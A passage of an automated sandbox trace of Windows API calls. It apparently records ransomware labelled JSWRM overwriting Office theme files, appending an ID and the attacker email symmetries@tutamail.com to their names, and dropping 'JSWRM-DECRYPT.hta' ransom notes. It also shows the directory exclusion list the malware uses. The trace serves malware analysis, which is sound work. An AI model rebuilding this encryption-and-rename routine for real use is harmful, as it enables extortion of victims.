returned 1 [0100.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0100.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0100.296] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1132ba98, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1132ba98, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1160070a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x18c4dc, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Retrospect.thmx", cAlternateFileName="RETROS~1.THM")) returned 1 [0100.296] lstrcmpiW (lpString1="Retrospect.thmx", lpString2=".") returned 1 [0100.297] lstrcmpiW (lpString1="Retrospect.thmx", lpString2="..") returned 1 [0100.297] lstrcmpiW (lpString1="Retrospect.thmx", lpString2="...") returned 1 [0100.297] lstrcmpiW (lpString1="Retrospect.thmx", lpString2="windows") returned -1 [0100.297] lstrcmpiW (lpString1="Retrospect.thmx", lpString2="recovery") returned 1 [0100.297] lstrcmpiW (lpString1="Retrospect.thmx", lpString2="perflogs") returned 1 [0100.297] lstrcmpiW (lpString1="Retrospect.thmx", lpString2="documents and settings") returned 1 [0100.297] lstrcmpiW (lpString1="Retrospect.thmx", lpString2="$RECYCLE.BIN") returned 1 [0100.297] lstrcmpiW (lpString1="Retrospect.thmx", lpString2="system volume information") returned -1 [0100.297] lstrcmpiW (lpString1="Retrospect.thmx", lpString2="msocache") returned 1 [0100.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0100.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Retrospect.thmx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Retrospect.thmx", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Retrospect.thmx", lpUsedDefaultChar=0x0) returned 15 [0100.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0100.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0100.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Retrospect.thmx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Retrospect.thmx", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Retrospect.thmx", lpUsedDefaultChar=0x0) returned 15 [0100.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0100.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0100.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0100.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0100.297] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Retrospect.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\retrospect.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0100.298] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=1623260) returned 1 [0100.298] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0100.298] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0100.308] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.308] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0100.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.309] CloseHandle (hObject=0x45c) returned 1 [0100.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0100.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0100.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0100.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0100.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0100.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0100.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.309] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Retrospect.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\retrospect.thmx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Retrospect.thmx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\retrospect.thmx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0100.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0100.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0100.310] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11377f40, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11377f40, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x115b4243, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd322a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Slice.thmx", cAlternateFileName="SLICE~1.THM")) returned 1 [0100.310] lstrcmpiW (lpString1="Slice.thmx", lpString2=".") returned 1 [0100.310] lstrcmpiW (lpString1="Slice.thmx", lpString2="..") returned 1 [0100.310] lstrcmpiW (lpString1="Slice.thmx", lpString2="...") returned 1 [0100.310] lstrcmpiW (lpString1="Slice.thmx", lpString2="windows") returned -1 [0100.310] lstrcmpiW (lpString1="Slice.thmx", lpString2="recovery") returned 1 [0100.310] lstrcmpiW (lpString1="Slice.thmx", lpString2="perflogs") returned 1 [0100.310] lstrcmpiW (lpString1="Slice.thmx", lpString2="documents and settings") returned 1 [0100.310] lstrcmpiW (lpString1="Slice.thmx", lpString2="$RECYCLE.BIN") returned 1 [0100.310] lstrcmpiW (lpString1="Slice.thmx", lpString2="system volume information") returned -1 [0100.310] lstrcmpiW (lpString1="Slice.thmx", lpString2="msocache") returned 1 [0100.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0100.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Slice.thmx", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Slice.thmx", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Slice.thmx", lpUsedDefaultChar=0x0) returned 10 [0100.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0100.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0100.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Slice.thmx", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Slice.thmx", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Slice.thmx", lpUsedDefaultChar=0x0) returned 10 [0100.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0100.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0100.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0100.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0100.311] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Slice.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\slice.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0100.312] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=864810) returned 1 [0100.312] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0100.312] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0100.441] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.441] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0100.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.442] CloseHandle (hObject=0x45c) returned 1 [0100.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0100.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0100.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0100.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0100.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0100.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0100.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.443] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Slice.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\slice.thmx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Slice.thmx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\slice.thmx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0100.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0100.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0100.444] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1132ba98, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x115da4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x115da4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Theme Colors", cAlternateFileName="THEMEC~1")) returned 1 [0100.444] lstrcmpiW (lpString1="Theme Colors", lpString2=".") returned 1 [0100.444] lstrcmpiW (lpString1="Theme Colors", lpString2="..") returned 1 [0100.444] lstrcmpiW (lpString1="Theme Colors", lpString2="...") returned 1 [0100.444] lstrcmpiW (lpString1="Theme Colors", lpString2="windows") returned -1 [0100.444] lstrcmpiW (lpString1="Theme Colors", lpString2="recovery") returned 1 [0100.444] lstrcmpiW (lpString1="Theme Colors", lpString2="perflogs") returned 1 [0100.444] lstrcmpiW (lpString1="Theme Colors", lpString2="documents and settings") returned 1 [0100.444] lstrcmpiW (lpString1="Theme Colors", lpString2="$RECYCLE.BIN") returned 1 [0100.444] lstrcmpiW (lpString1="Theme Colors", lpString2="system volume information") returned 1 [0100.444] lstrcmpiW (lpString1="Theme Colors", lpString2="msocache") returned 1 [0100.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0100.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0100.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0100.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0100.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0100.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0100.444] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\jswrm-decrypt.hta")) returned 0xffffffff [0100.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0100.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0100.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x205850 [0100.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0100.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24d210 [0100.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0100.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0100.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0100.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0100.446] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0100.446] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.446] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0100.447] CloseHandle (hObject=0x45c) returned 1 [0100.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0100.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0100.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0100.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0100.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0100.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0100.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0100.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0100.448] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\jswrm-decrypt.hta")) returned 0x20 [0100.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0100.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0100.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0100.448] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1132ba98, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x115da4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x328851e3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName=".", cAlternateFileName="")) returned 0x232080 [0100.448] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0100.448] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1132ba98, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x115da4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x328851e3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="..", cAlternateFileName="")) returned 1 [0100.448] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0100.448] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0100.448] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x115da4b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x115da4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x115da4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e4, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Aspect.xml", cAlternateFileName="")) returned 1 [0100.448] lstrcmpiW (lpString1="Aspect.xml", lpString2=".") returned 1 [0100.448] lstrcmpiW (lpString1="Aspect.xml", lpString2="..") returned 1 [0100.448] lstrcmpiW (lpString1="Aspect.xml", lpString2="...") returned 1 [0100.448] lstrcmpiW (lpString1="Aspect.xml", lpString2="windows") returned -1 [0100.448] lstrcmpiW (lpString1="Aspect.xml", lpString2="recovery") returned -1 [0100.448] lstrcmpiW (lpString1="Aspect.xml", lpString2="perflogs") returned -1 [0100.448] lstrcmpiW (lpString1="Aspect.xml", lpString2="documents and settings") returned -1 [0100.448] lstrcmpiW (lpString1="Aspect.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.448] lstrcmpiW (lpString1="Aspect.xml", lpString2="system volume information") returned -1 [0100.448] lstrcmpiW (lpString1="Aspect.xml", lpString2="msocache") returned -1 [0100.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0100.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Aspect.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Aspect.xml", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Aspect.xml", lpUsedDefaultChar=0x0) returned 10 [0100.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0100.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0100.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Aspect.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Aspect.xml", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, 